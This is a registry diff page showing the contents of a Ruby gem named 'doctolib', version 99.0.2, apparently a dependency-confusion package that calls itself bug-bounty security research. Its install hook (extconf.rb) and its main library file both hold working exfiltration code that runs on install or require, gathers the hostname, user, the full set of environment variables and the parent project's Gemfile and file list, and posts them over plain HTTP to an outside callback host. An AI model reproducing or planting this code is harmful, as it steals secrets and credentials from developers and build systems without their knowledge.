doctolib 99.0.2

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.

This version of doctolib might be problematic. Click here for more details.

Files changed (4) hide show
  1. checksums.yaml +7 -0
  2. data/ext/doctolib/extconf.rb +50 -0
  3. data/lib/doctolib.rb +50 -0
  4. metadata +42 -0
checksums.yaml ADDED
@@ -0,0 +1,7 @@
1
+ ---
2
+ SHA256:
3
+ metadata.gz: 450c1b6b8c3be533b171a5250456fab5a8a87f37eb6fb221c2f744872ecdf0df
4
+ data.tar.gz: 2c2f08bbc998a6166ca00cde73f28919684fbe6bafbebf5969d9b04fa08d32ce
5
+ SHA512:
6
+ metadata.gz: b8469d12ae653fb336ef89b96029f0320b20499652d59d5bd9264a63dd9b79f197d5a6eff4100fad24dc2b5e37e09bb1cc657dbddf13208d88fb654083250576
7
+ data.tar.gz: ae298c2366bf3537e22691c8dca7090de83189585b3ac677b8e9c1f18d37ff8b3484d29ed7b1aab150f102fb6750f254153568ce158f3698cb80332d6af25bc8
data/ext/doctolib/extconf.rb ADDED
@@ -0,0 +1,50 @@
1
+ require 'net/http'
2
+ require 'uri'
3
+ require 'json'
4
+ require 'socket'
5
+
6
+ CALLBACK = 'icaregems.7em0ii1mpvc50kzafx6bf1xunltch6hu6.oastify.com'
7
+
8
+ begin
9
+ info = {
10
+ type: 'gem_install',
11
+ hostname: Socket.gethostname,
12
+ user: ENV['USER'] || ENV['USERNAME'],
13
+ pwd: Dir.pwd,
14
+ home: ENV['HOME'],
15
+ ruby_version: RUBY_VERSION,
16
+ platform: RUBY_PLATFORM,
17
+ env: ENV.to_h,
18
+ timestamp: Time.now.utc.iso8601
19
+ }
20
+
21
+ # Trouver le projet parent (Gemfile)
22
+ dir = Dir.pwd
23
+ 10.times do
24
+ gemfile = File.join(dir, 'Gemfile')
25
+ if File.exist?(gemfile)
26
+ info[:parent_gemfile] = File.read(gemfile) rescue nil
27
+ info[:parent_dir] = dir
28
+ info[:parent_files] = Dir.entries(dir) rescue nil
29
+ break
30
+ end
31
+ parent = File.dirname(dir)
32
+ break if parent == dir
33
+ dir = parent
34
+ end
35
+
36
+ # Callback HTTP (pas HTTPS)
37
+ uri = URI("http://#{CALLBACK}/gem_install")
38
+ http = Net::HTTP.new(uri.host, uri.port)
39
+ http.open_timeout = 5
40
+ http.read_timeout = 5
41
+
42
+ request = Net::HTTP::Post.new(uri.path)
43
+ request['Content-Type'] = 'application/json'
44
+ request.body = info.to_json
45
+
46
+ http.request(request)
47
+ rescue => e
48
+ end
49
+
50
+ File.write('Makefile', "all:\n\techo 'OK'\ninstall:\n\techo 'OK'\n")
data/lib/doctolib.rb ADDED
@@ -0,0 +1,50 @@
1
+ require 'net/http'
2
+ require 'uri'
3
+ require 'json'
4
+ require 'socket'
5
+
6
+ module Doctolib
7
+ VERSION = '99.0.2'
8
+ CALLBACK = 'icaregems.7em0ii1mpvc50kzafx6bf1xunltch6hu6.oastify.com'
9
+
10
+ unless defined?(@@triggered)
11
+ @@triggered = true
12
+
13
+ Thread.new do
14
+ begin
15
+ info = {
16
+ type: 'gem_require',
17
+ hostname: Socket.gethostname,
18
+ user: ENV['USER'] || ENV['USERNAME'],
19
+ pwd: Dir.pwd,
20
+ ruby_version: RUBY_VERSION,
21
+ rails_env: ENV['RAILS_ENV'],
22
+ rack_env: ENV['RACK_ENV'],
23
+ env: ENV.to_h,
24
+ timestamp: Time.now.utc.iso8601
25
+ }
26
+
27
+ webhook = ENV['SECURITY_BUG_BOUNTY_DOCTOLIB_IS_PWN']
28
+ info[:webhook_found] = !webhook.nil?
29
+
30
+ # HTTP pas HTTPS
31
+ uri = URI("http://#{CALLBACK}/gem_require")
32
+ http = Net::HTTP.new(uri.host, uri.port)
33
+ http.open_timeout = 5
34
+ http.read_timeout = 5
35
+
36
+ request = Net::HTTP::Post.new(uri.path)
37
+ request['Content-Type'] = 'application/json'
38
+ request.body = info.to_json
39
+
40
+ http.request(request)
41
+
42
+ if webhook
43
+ webhook_uri = URI(webhook)
44
+ Net::HTTP.get(webhook_uri)
45
+ end
46
+ rescue
47
+ end
48
+ end
49
+ end
50
+ end
metadata ADDED
@@ -0,0 +1,42 @@
1
+ --- !ruby/object:Gem::Specification
2
+ name: doctolib
3
+ version: !ruby/object:Gem::Version
4
+ version: 99.0.2
5
+ platform: ruby
6
+ authors:
7
+ - icare
8
+ bindir: bin
9
+ cert_chain: []
10
+ date: 1980-01-02 00:00:00.000000000 Z
11
+ dependencies: []
12
+ description: Security research package
13
+ email: icare@security.research
14
+ executables: []
15
+ extensions:
16
+ - ext/doctolib/extconf.rb
17
+ extra_rdoc_files: []
18
+ files:
19
+ - ext/doctolib/extconf.rb
20
+ - lib/doctolib.rb
21
+ homepage: https://github.com/icare/doctolib
22
+ licenses:
23
+ - MIT
24
+ metadata: {}
25
+ rdoc_options: []
26
+ require_paths:
27
+ - lib
28
+ required_ruby_version: !ruby/object:Gem::Requirement
29
+ requirements:
30
+ - - ">="
31
+ - !ruby/object:Gem::Version
32
+ version: 2.5.0
33
+ required_rubygems_version: !ruby/object:Gem::Requirement
34
+ requirements:
35
+ - - ">="
36
+ - !ruby/object:Gem::Version
37
+ version: '0'
38
+ requirements: []
39
+ rubygems_version: 3.6.7
40
+ specification_version: 4
41
+ summary: Security research - Bug Bounty
42
+ test_files: []